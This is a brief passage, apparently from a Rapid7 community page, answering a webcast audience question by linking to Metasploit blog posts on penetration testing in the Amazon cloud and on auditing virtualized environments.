https://community.rapid7.com/community/metasploit/blog/2012/01/12/what-you-need- to-observe-when-running-a-penetration-test-in-the-amazon-cloud

 

Also, you can scan virtualized (e.g. cloud) environments from Metasploit to audit their security. For more info, please read this blog post:

https://community.rapid7.com/community/metasploit/blog/2012/03/05/how-to-own-a-v irtual-data-center

 

---

This was an audience question from the webcast "OWASP Top 10 2013: What’s New - and How to Audit Your Web Apps". You can view a recorded version here: OWASP Top 10 and Web App Scanning Webcast | Rapid7.